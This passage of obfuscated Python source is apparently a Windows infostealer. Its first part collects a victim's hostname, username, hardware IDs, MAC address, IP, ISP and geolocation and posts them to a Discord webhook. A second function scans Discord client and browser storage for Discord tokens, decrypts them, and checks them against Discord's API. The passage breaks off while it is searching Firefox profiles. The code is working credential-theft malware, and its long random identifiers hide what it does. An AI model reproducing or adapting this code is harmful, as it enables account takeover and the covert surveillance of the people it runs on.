        QCLYPGGAZARLEKBBREKVEVKVDOQDIVPTTOESODXANRTGWFXVMRXKQQUHYIGHMXMWVQBYYMLXNBDYUOZBFMZZGBV = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if QCLYPGGAZARLEKBBREKVEVKVDOQDIVPTTOESODXANRTGWFXVMRXKQQUHYIGHMXMWVQBYYMLXNBDYUOZBFMZZGBV & 1:
                SBFFDZDVVCZELRDVKGTLGHGYAVJSRMSMIRYCRYFFWTHPTZPPIYTSUSCV = v4r_letter + ":\\"
                try:
                    XIGHTUSNUXPRCLVXVCVYTVZLAVVZTVZWXHTBKLWPYLQZJZOGABJGFG = ctypes.c_ulonglong(0)
                    RAAEEXEDWMMUBLDEVKEDGVWVVWNZYIQQRDNAGWLJZNYLOIMZOMNTKDYRAHJAHWHGL = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(SBFFDZDVVCZELRDVKGTLGHGYAVJSRMSMIRYCRYFFWTHPTZPPIYTSUSCV), None, ctypes.pointer(RAAEEXEDWMMUBLDEVKEDGVWVVWNZYIQQRDNAGWLJZNYLOIMZOMNTKDYRAHJAHWHGL), ctypes.pointer(XIGHTUSNUXPRCLVXVCVYTVZLAVVZTVZWXHTBKLWPYLQZJZOGABJGFG))
                    TWQKVFKONAVPMLVLRLNMJTLOFPIKZTMFKQMENOFBHVISYQABWWFUTAUHLRATVDNCQEST = RAAEEXEDWMMUBLDEVKEDGVWVVWNZYIQQRDNAGWLJZNYLOIMZOMNTKDYRAHJAHWHGL.value
                    BFBQRECGTZNTCBCYULMYQFHOASWVTPRVBWIQPDQDVUZQOXBQUJMFYDSCC = XIGHTUSNUXPRCLVXVCVYTVZLAVVZTVZWXHTBKLWPYLQZJZOGABJGFG.value
                    IDLZOPBFMPSCJDDUERXFUVDBSTIUKLEQPQHOSSVQWZYTWZVFVTDTDUV = TWQKVFKONAVPMLVLRLNMJTLOFPIKZTMFKQMENOFBHVISYQABWWFUTAUHLRATVDNCQEST - BFBQRECGTZNTCBCYULMYQFHOASWVTPRVBWIQPDQDVUZQOXBQUJMFYDSCC
                    OGNOXMBICTOBNTBXEJVFRGTSDPVRWLSLKIULDDPEDZJYUUTNAHDPCZVDHZVKMFUZXYRMECMPD = win32api.GetVolumeInformation(SBFFDZDVVCZELRDVKGTLGHGYAVJSRMSMIRYCRYFFWTHPTZPPIYTSUSCV)[0]
                    drive = {
                        'drive': SBFFDZDVVCZELRDVKGTLGHGYAVJSRMSMIRYCRYFFWTHPTZPPIYTSUSCV,
                        'total': TWQKVFKONAVPMLVLRLNMJTLOFPIKZTMFKQMENOFBHVISYQABWWFUTAUHLRATVDNCQEST,
                        'free': BFBQRECGTZNTCBCYULMYQFHOASWVTPRVBWIQPDQDVUZQOXBQUJMFYDSCC,
                        'used': IDLZOPBFMPSCJDDUERXFUVDBSTIUKLEQPQHOSSVQWZYTWZVFVTDTDUV,
                        'name': OGNOXMBICTOBNTBXEJVFRGTSDPVRWLSLKIULDDPEDZJYUUTNAHDPCZVDHZVKMFUZXYRMECMPD,
                    }
                    PZEYIDHGWCIKPPNPGMNIANEZNEJDYMNUAJMMJKEKJEHIIRTHBVYFWSRARUJADRFVNMHNXMBSGGAELYWYIFI.append(drive)
                except:
                    ()
            QCLYPGGAZARLEKBBREKVEVKVDOQDIVPTTOESODXANRTGWFXVMRXKQQUHYIGHMXMWVQBYYMLXNBDYUOZBFMZZGBV >>= 1

        DXIEOIHXGPMLZELYPAOMRSUILUFUGPNSTTBCWLOHKMUUMXXUHPMVWEP = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in PZEYIDHGWCIKPPNPGMNIANEZNEJDYMNUAJMMJKEKJEHIIRTHBVYFWSRARUJADRFVNMHNXMBSGGAELYWYIFI:
            NMRQPESDZPZMUWTZICIAHLYIMRKIUQFQBUPYGJKUMDJPPVCNNPQOGF = (v4r_drive['used'] / v4r_drive['total']) * 100
            BFBQRECGTZNTCBCYULMYQFHOASWVTPRVBWIQPDQDVUZQOXBQUJMFYDSCC_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            TWQKVFKONAVPMLVLRLNMJTLOFPIKZTMFKQMENOFBHVISYQABWWFUTAUHLRATVDNCQEST_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            NMRQPESDZPZMUWTZICIAHLYIMRKIUQFQBUPYGJKUMDJPPVCNNPQOGF_str = "{:.2f}%".format(NMRQPESDZPZMUWTZICIAHLYIMRKIUQFQBUPYGJKUMDJPPVCNNPQOGF)
            DXIEOIHXGPMLZELYPAOMRSUILUFUGPNSTTBCWLOHKMUUMXXUHPMVWEP += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   BFBQRECGTZNTCBCYULMYQFHOASWVTPRVBWIQPDQDVUZQOXBQUJMFYDSCC_gb,
                                                                   TWQKVFKONAVPMLVLRLNMJTLOFPIKZTMFKQMENOFBHVISYQABWWFUTAUHLRATVDNCQEST_gb,
                                                                   NMRQPESDZPZMUWTZICIAHLYIMRKIUQFQBUPYGJKUMDJPPVCNNPQOGF_str,
                                                                   v4r_drive['name'])
    except:
        DXIEOIHXGPMLZELYPAOMRSUILUFUGPNSTTBCWLOHKMUUMXXUHPMVWEP = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def IsPortable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if IsPortable():
            VHQLISZLFZGVMFNEIEJURPPHHKPOBREIGZPMPJXEUFOXRVGRDJVXOUUTSRYCXEJXHJRDUUNAZHJGYLPD = 'Pc Portable'
        else:
            VHQLISZLFZGVMFNEIEJURPPHHKPOBREIGZPMPJXEUFOXRVGRDJVXOUUTSRYCXEJXHJRDUUNAZHJGYLPD = 'Pc Fixed'
    except:
        VHQLISZLFZGVMFNEIEJURPPHHKPOBREIGZPMPJXEUFOXRVGRDJVXOUUTSRYCXEJXHJRDUUNAZHJGYLPD = "None"

    try: XZUNBJUADDCQHDOTOYSEXPZMCOUTZQEINIVMRNRVMPGRQUGRQWLNR = len(screeninfo.get_monitors())
    except: XZUNBJUADDCQHDOTOYSEXPZMCOUTZQEINIVMRNRVMPGRQUGRQWLNR = "None"

    embed = Embed(title=f'System Info {QLCBWIEQVVUZNWUHVOQAXBXBRKUEXVCCUMVVWGSWYHYIBWRRGKZVYGLLHXYCID}:', color=NDZNZJWCYHXULIEBQOGILPOEDLVAIHCGAVLBZYISVQROYBYCYXLBUEAGSKGONODBBJIVP)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {QGMOKCWSVTHNVDTBSOYGANWIGUGSPYNEOLVIJYGTNOYJTRTKJYMRZYXCHNTGSCNDDPXVRCHSDCSGMNMYCBZM}
Username    : {XVGSADWUBLBDNDPLJWYXLDTLSAXVRNLOGROGUDEDSZXENAPSGOCVRZN}
DisplayName : {JSOIMISCXLVEUDBEXGIPFMEQPKKNBOCHLDMTWURUGRMZZQTFVCGBAVGCYDDJMBDTJIDVADVM}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {VHQLISZLFZGVMFNEIEJURPPHHKPOBREIGZPMPJXEUFOXRVGRDJVXOUUTSRYCXEJXHJRDUUNAZHJGYLPD}
Exploitation  : {PSNNUTNMLSHLFNUOZUJOKZYFIMXASLMTTBETRYXWJQKLFLKEKES} {GJHLZEYKUVXZAKWZTHUZUUFSPFDVQZOAOYGIGAHDFZIVRDHDJCTQGTFRSY}
Screen Number : {XZUNBJUADDCQHDOTOYSEXPZMCOUTZQEINIVMRNRVMPGRQUGRQWLNR}

HWID : {GYHENUVWTAGEEHRQQQSWWSIWDIICAERLCZSGVGMOMLQBQRBLEDJXDGIORTFQTBTEYMSHKZVNLHAVH}
MAC  : {EHLAAZYEQXIPMFWMQAIJPQDSDSIIFTMBPMPHOMMFMZFDYHWCNEHHZARNRGYAEALTTRRAEDQGOXMXJLEOJHM}
CPU  : {BPKLPXHQCAJQVRMJONTYKQXTCQNESBKOVRAJSEJVZVUOOHUADLQNKDWLRHOMSFVUGBN}, {OFZMBFCUWRBSXKSBMGQTUMAKSDLTLIWDMCEYQMYBNVBTBQMGOSHRTJI} Core
GPU  : {TVOMOKOXJYFHLOMFMMABSPSCPHSUMEQZNQFHMFQRYEERKLPMDPXCWFXJRHOYOALIFTFKXKSSVPQCXIRUXDOO}
RAM  : {XNBLWRFBBOFUPVSTYDXFLGVODKLYFWUMGSYZZASKZILSATXKDOQURPYSIZMLOLDAGTTZQDRBMTNOXYM}Go```""", inline=False)

    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {EBRLITLEOUKWQPCEPRJVPEYNWSXBEGAANMWMWDCSHMORJOTXGBXOOPNAML}
Local  : {WGYIHTFTXYXAONMOKUPZNGXBSRTSGZNFLXIFCVSOCFFTTLLHFQNRXCSSMFNYIVEBJNOCF}
Isp    : {YELBESAUZAQRAABOBJLHUDLVWLIRNOJEIHWJDHMWCIJRASYCCOKOJYNNJQYGELIAYMONDWVVT}
Org    : {ZCBIGMOQZKTCSLNATTHGFDMKODGCSKPDPPJXGGCZNZEKRSLRBGACJTECSJALJSV}
As     : {VDLNVSHFUUFWISFCJDQCOXAYZKVDRKDKOZWYPLABHTNVBXLHSEVSJAN}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{DXIEOIHXGPMLZELYPAOMRSUILUFUGPNSTTBCWLOHKMUUMXXUHPMVWEP}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {XXFCLHELCZPNCWKZNJQRCTDIWJOKVADEZMRGQZZMYSGFNQKAQKGOLAVYMOYJIGYZHCHJQXTGWHLGWK} ({XXFCLHELCZPNCWKZNJQRCTDIWJOKVADEZMRGQZZMYSGFNQKAQKGOLAVYMOYJIGYZHCHJQXTGWHLGWK_code})
Region    : {NRPFMBTGIFZSFVICYCYACARHWXWUVINFUHKSTSGYFTGYVPRRUYIVIVLSPPBDAPNMPP} ({NRPFMBTGIFZSFVICYCYACARHWXWUVINFUHKSTSGYFTGYVPRRUYIVIVLSPPBDAPNMPP_code})
Zip       : {NILJWIHFAXKFBZCBYZKFRNYKETBSOIGXGMYXZNVKXQKBJKGSYAU}
City      : {APIRNPHVEJLPBFHPXPFGXOCROHHXWSEAZVFOXQOQSLAXUNVYHLLOXYAPAVTIR}
Timezone  : {CZDKUQDIGYRGAEHBQBQAJCLYHPNFKPNYBPBBRGYPZAXUKSBXWDURJQSOMZYN}
Latitude  : {XQLKLYOQDTOSONOTRMCZGXEKFLKJJGUJAGYCEETPMXDDEDFAYRGNHBQDTNWUVOYRVZQLOL}
Longitude : {DGMAEMFRDQZRPLILPTPENSCTTNOKOEIXSZUAIQJGCDCFRKHXLLLLDXAQDYXLIFFSFIOCDMRSKXHTDLIOJHAXNNDIMONOTTBHIDTU}```""", inline=False)


    embed.set_footer(text=GDBWKXYLDZVZBNWZZFFZYRRGPHFAMOYZKBGQJCAWYZHKXURVGYSOFDUEQZLDPTGN, icon_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR)

    KWRJCWTAGGQWYWCFETNXSXOUTTMQHNTLAQASRSPIWJYKMUGVPNHEDCHTIOIWYLPYUCOWZOAXTQCHEUSRKFMCZBUZUCJEF = SyncWebhook.from_url(XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD)
    KWRJCWTAGGQWYWCFETNXSXOUTTMQHNTLAQASRSPIWJYKMUGVPNHEDCHTIOIWYLPYUCOWZOAXTQCHEUSRKFMCZBUZUCJEF.send(embed=embed, username=TCQVWBVWRGAWZJFAVAAEZLFRUWGNTHXWRMCHKMDTPFLHWJJBRKGWLG, avatar_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR)

def GCXCGITAZLRORAVNLWTTRRHMTIAQGZHMEIPRICXAOAHYQFWQGCJRRONECGXKVUKVHVHI():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def OSOVCDAEBIWOVYBZEGGRBXZZDHUYDYBXZLNBVFBWQQCORQXVGMCVHUZQVREUUBGEZCEUHURKNWAIYLRJUNSTBGA():
        XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU = "https://discord.com/api/v9/users/@me"
        BNATLHRAYTDFZXMKYWJGDVNDOISUUNXTMNUKRVLJDDLRTCWSTUTFHWQOZFVPHAREUPRSYHYLMOEWW = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        BNATLHRAYTDFZXMKYWJGDVNDOISUUNXTMNUKRVLJDDLRTCWSTUTFHWQOZFVPHAREUPRSYHYLMOEWW_enc = r"dQw4w9WgXcQ:[^\"]*"
        RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE = []
        PJTBXKTPMGAYSRSFTXCCMOUUKWQMOCUKHRAPHRAGXHUDIZPIJELXRSBVADXPBTQPOMXVXNBIHZXUSQQGHXPAHTDEJARPPJ = []
        KECNWROQOMFPLYQVRXTMWZHKLCGJUHJVLUBLYNWJGVXZMKUVPCAZUNWDLUHBWPFCEDSVWAQQVWFBMUVF = {}

        WJQGEEQQAKZSPHTYFCQEECSMAIIKRHNVKENHUQOGUMBLUAMEAPOLYT = {
            'Discord': EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for EGLOHMHWBRJQYYTOPHFDKFNMTFVHDHHUIFKAEXHJJIIIKMJXJFCHSPHNHAATAAEMGKMEYJNIAWCOUA, INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK in WJQGEEQQAKZSPHTYFCQEECSMAIIKRHNVKENHUQOGUMBLUAMEAPOLYT.items():
            if not os.path.exists(INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK):
                continue
            FTPHAEQAQXLWWBKBHFTJLUIYPNXJARFMYGUMUNNUNSQIWXQCFCDUUSQRQVPZBYKARMREVHPSFQXBBDCDOVI = EGLOHMHWBRJQYYTOPHFDKFNMTFVHDHHUIFKAEXHJJIIIKMJXJFCHSPHNHAATAAEMGKMEYJNIAWCOUA.replace(" ", "").lower()
            if "cord" in INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK:
                if not os.path.exists(EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + f'\\{FTPHAEQAQXLWWBKBHFTJLUIYPNXJARFMYGUMUNNUNSQIWXQCFCDUUSQRQVPZBYKARMREVHPSFQXBBDCDOVI}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(BNATLHRAYTDFZXMKYWJGDVNDOISUUNXTMNUKRVLJDDLRTCWSTUTFHWQOZFVPHAREUPRSYHYLMOEWW_enc, v4r_line.strip()):
                                WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ = EETINXGTAXUPCZKGJWPCQZCPPKTCNPEXFEHHNZHEJRIXVZBVIAETNTDWOOXKVXGUHGWGVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), ARGVHWHNCTFIVUGEDXVRAHQSIXGTZETXKERHJLORDMQNYSWFGHWRICBEAMSYRVVSEDNAOXGOGXDKADOUBUVLKCTFQC(EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + f'\\{FTPHAEQAQXLWWBKBHFTJLUIYPNXJARFMYGUMUNNUNSQIWXQCFCDUUSQRQVPZBYKARMREVHPSFQXBBDCDOVI}\\Local State'))
                                if JTPXJHZNUHUJYIXUMGRLNLSPUWIBZNAIENUDVFDBSSRCYCHCCRJUPXUYBIMNZDAAWBATAHGHCGQYKVMFPNKHQEQ(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ, XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU):
                                    FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW = requests.get(XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU, headers={'Authorization': WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ}).json()['id']
                                    if FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW not in PJTBXKTPMGAYSRSFTXCCMOUUKWQMOCUKHRAPHRAGXHUDIZPIJELXRSBVADXPBTQPOMXVXNBIHZXUSQQGHXPAHTDEJARPPJ:
                                        RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE.append(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ)
                                        PJTBXKTPMGAYSRSFTXCCMOUUKWQMOCUKHRAPHRAGXHUDIZPIJELXRSBVADXPBTQPOMXVXNBIHZXUSQQGHXPAHTDEJARPPJ.append(FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW)
                                        KECNWROQOMFPLYQVRXTMWZHKLCGJUHJVLUBLYNWJGVXZMKUVPCAZUNWDLUHBWPFCEDSVWAQQVWFBMUVF[WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ] = (EGLOHMHWBRJQYYTOPHFDKFNMTFVHDHHUIFKAEXHJJIIIKMJXJFCHSPHNHAATAAEMGKMEYJNIAWCOUA, f"{INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ in re.findall(BNATLHRAYTDFZXMKYWJGDVNDOISUUNXTMNUKRVLJDDLRTCWSTUTFHWQOZFVPHAREUPRSYHYLMOEWW, v4r_line.strip()):
                                if JTPXJHZNUHUJYIXUMGRLNLSPUWIBZNAIENUDVFDBSSRCYCHCCRJUPXUYBIMNZDAAWBATAHGHCGQYKVMFPNKHQEQ(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ, XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU):
                                    FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW = requests.get(XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU, headers={'Authorization': WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ}).json()['id']
                                    if FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW not in PJTBXKTPMGAYSRSFTXCCMOUUKWQMOCUKHRAPHRAGXHUDIZPIJELXRSBVADXPBTQPOMXVXNBIHZXUSQQGHXPAHTDEJARPPJ:
                                        RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE.append(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ)
                                        PJTBXKTPMGAYSRSFTXCCMOUUKWQMOCUKHRAPHRAGXHUDIZPIJELXRSBVADXPBTQPOMXVXNBIHZXUSQQGHXPAHTDEJARPPJ.append(FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW)
                                        KECNWROQOMFPLYQVRXTMWZHKLCGJUHJVLUBLYNWJGVXZMKUVPCAZUNWDLUHBWPFCEDSVWAQQVWFBMUVF[WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ] = (EGLOHMHWBRJQYYTOPHFDKFNMTFVHDHHUIFKAEXHJJIIIKMJXJFCHSPHNHAATAAEMGKMEYJNIAWCOUA, f"{INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK}\\{v4r_file_name}")

        if os.path.exists(EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + "\\Mozilla\\Firefox\\Profiles"):
            for INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK, _, v4r_files in os.walk(EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ in re.findall(BNATLHRAYTDFZXMKYWJGDVNDOISUUNXTMNUKRVLJDDLRTCWSTUTFHWQOZFVPHAREUPRSYHYLMOEWW, v4r_line.strip()):
